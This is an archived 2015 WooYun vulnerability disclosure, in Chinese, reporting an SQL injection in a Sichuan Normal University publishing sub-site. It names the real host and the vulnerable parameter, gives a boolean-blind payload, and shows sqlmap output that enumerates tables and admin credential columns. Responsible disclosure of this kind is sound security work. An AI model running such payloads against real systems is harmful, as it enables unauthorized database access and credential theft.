乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-27: 细节已通知厂商并且等待厂商处理中 2015-07-27: 厂商已经确认,细节仅向厂商公开 2015-08-06: 细节向核心白帽子及相关领域专家公开 2015-08-16: 细节向普通白帽子公开 2015-08-26: 细节向实习白帽子公开 2015-09-10: 细节向公众公开
四川师范大学某分站存在sql注入
四川师范大学电子出版社:
http://202.115.194.105/index.asp
注入点:
http://202.115.194.105/news_veiw.asp?id=126
直接上结果:
sqlmap identified the following injection points with a total of 83 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=126 AND 9348=9348---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Accesssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=126 AND 9348=9348---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[3 tables]+-----------+| company || user_info || users |+-----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=126 AND 9348=9348---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: users[3 columns]+---------+---------+| Column | Type |+---------+---------+| news_id | numeric || type | numeric || user_id | numeric |+---------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=126 AND 9348=9348---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: user_info[4 columns]+------------+-------------+| Column | Type |+------------+-------------+| admin_id | numeric || admin_name | non-numeric || admin_pass | non-numeric || news_id | numeric |+------------+-------------+
后面不再深入
如上
进行过滤处理
危害等级:低
漏洞Rank:3
确认时间:2015-07-27 12:09
感谢提醒
暂无